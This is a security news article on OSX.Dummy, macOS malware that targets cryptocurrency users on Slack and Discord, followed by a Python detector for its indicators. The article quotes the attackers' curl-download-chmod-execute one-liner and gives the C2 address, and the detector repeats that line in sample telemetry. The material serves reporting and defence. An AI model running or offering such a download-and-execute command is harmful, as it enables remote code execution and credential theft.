
macOS Malware Targeting Cryptocurrency Users on Slack and Discord – 100% Undetected on VirusTotal

Hackers are targeting cryptocurrency users on the Slack and Discord chat platforms with macOS malware dubbed OSX.Dummy.

The malware targets users in crypto-related Slack or Discord chat groups by impersonating admins or other key people. The attackers share small snippets that result in the malware being downloaded, said Remco Verhoef, who first spotted it.

The attackers trick users into infecting themselves by running the following one-liner, which downloads and executes the malware:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

If the victim runs the command, curl downloads a large (34 MB) 64-bit Mach-O binary to /tmp/script, which had a perfect score of 0/64 detections on VirusTotal, and the file is then executed.

macOS malware is not signed

The malware was later analyzed by malware researcher Patrick Wardle. According to his analysis, the binary is not signed, and various libraries such as OpenSSL and V8 appear to be statically compiled in.

The malware bypasses Gatekeeper, which restricts the running of unsigned binaries; it was first introduced in Mac OS X Leopard, enforces code signing and verifies an application before it runs.

But if the user downloads and runs the binary through the Terminal, Gatekeeper does not come into play, so the unsigned binary executes.

Wardle said the malware sets itself to run as root and prompts the user for a password in order to change the file's permissions. The password is then saved to /tmp/dumpdummy, and the malware sets the script to be executable.

If the attack succeeds, the malware establishes a connection to the attackers' C&C server (185[.]243[.]115[.]230) on port 1337, and the attacker can execute arbitrary commands as root on the infected machine.
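Because the binary is fetched with curl and run from the Terminal, Gatekeeper never examines it, so detection has to come from endpoint telemetry rather than from the file itself. The following script is an added example written for this article (it is not code from the original report, from Verhoef, or from Wardle): it scans constructed command-line and network telemetry lines for the three indicators the article gives, the cd-curl-chmod-execute chain, the /tmp/dumpdummy password file, and a connection to 185.243.115.230 on port 1337. The telemetry line format ("cmd" or "net", a tab, then the payload) and all sample lines are assumptions made up for the example.

```python
"""Detect the OSX.Dummy infection pattern in constructed endpoint telemetry.

Added example for this article, not code from the original post.
Telemetry format is assumed: "<kind>\t<payload>", kind in {"cmd", "net"}.
"""
import re
from dataclasses import dataclass
from typing import List

# Indicators taken from the article (C2 IP is written defanged there).
C2_IP = "185.243.115.230"
C2_PORT = 1337
PASSWORD_DUMP_PATH = "/tmp/dumpdummy"

# Stages of the one-liner: cd /tmp, curl output redirected to a file,
# chmod +x, then execution of a local file. Matching the stages separately
# tolerates changes in the URL or file name between campaigns.
STAGE_PATTERNS = {
    "cd_tmp": re.compile(r"\bcd\s+/tmp\b"),
    "curl_redirect": re.compile(r"\bcurl\b.*>\s*\S+"),
    "chmod_exec": re.compile(r"\bchmod\s+\+x\s+\S+"),
    "exec_local": re.compile(r"\./\S+"),
}

# Three of the four stages in a single command is enough to alert on.
ALERT_THRESHOLD = 3


@dataclass
class Finding:
    line_no: int
    reason: str
    text: str


def classify_command(cmd: str) -> List[str]:
    """Return the names of infection-chain stages present in one shell command."""
    return [name for name, pat in STAGE_PATTERNS.items() if pat.search(cmd)]


def scan_telemetry(lines: List[str]) -> List[Finding]:
    """Walk telemetry lines and collect findings for each OSX.Dummy indicator."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, 1):
        kind, _, payload = line.partition("\t")
        if kind == "cmd":
            stages = classify_command(payload)
            if len(stages) >= ALERT_THRESHOLD:
                findings.append(Finding(line_no,
                                        "download-and-execute chain: " + ",".join(stages),
                                        payload))
            if PASSWORD_DUMP_PATH in payload:
                findings.append(Finding(line_no,
                                        "reference to OSX.Dummy password dump file",
                                        payload))
        elif kind == "net":
            # Assumed payload layout: "<src_ip>:<src_port> -> <dst_ip>:<dst_port>"
            m = re.search(r"->\s*(\d+\.\d+\.\d+\.\d+):(\d+)", payload)
            if m and m.group(1) == C2_IP and int(m.group(2)) == C2_PORT:
                findings.append(Finding(line_no,
                                        "connection to known OSX.Dummy C2",
                                        payload))
    return findings


# Constructed sample telemetry; hosts and the download URL are placeholders.
SAMPLE_TELEMETRY = [
    "cmd\tls -la ~/Downloads",
    "cmd\tcd /tmp && curl -s curl http://example.invalid/payload > script && chmod +x script && ./script",
    "cmd\tcat /tmp/dumpdummy",
    "net\t192.0.2.10:51234 -> 185.243.115.230:1337",
    "net\t192.0.2.10:51235 -> 198.51.100.7:443",
    "cmd\tcurl -s https://example.invalid/notes.txt > notes.txt",
]

if __name__ == "__main__":
    for f in scan_telemetry(SAMPLE_TELEMETRY):
        print(f"line {f.line_no}: {f.reason}\n    {f.text}")
```

A single curl redirect (the last sample line) stays below the threshold, so ordinary downloads are not flagged; the alert fires on the combination of stages, and the file path and C2 checks are independent of it so that a later stage of the same intrusion is still caught.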


Gurubaran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
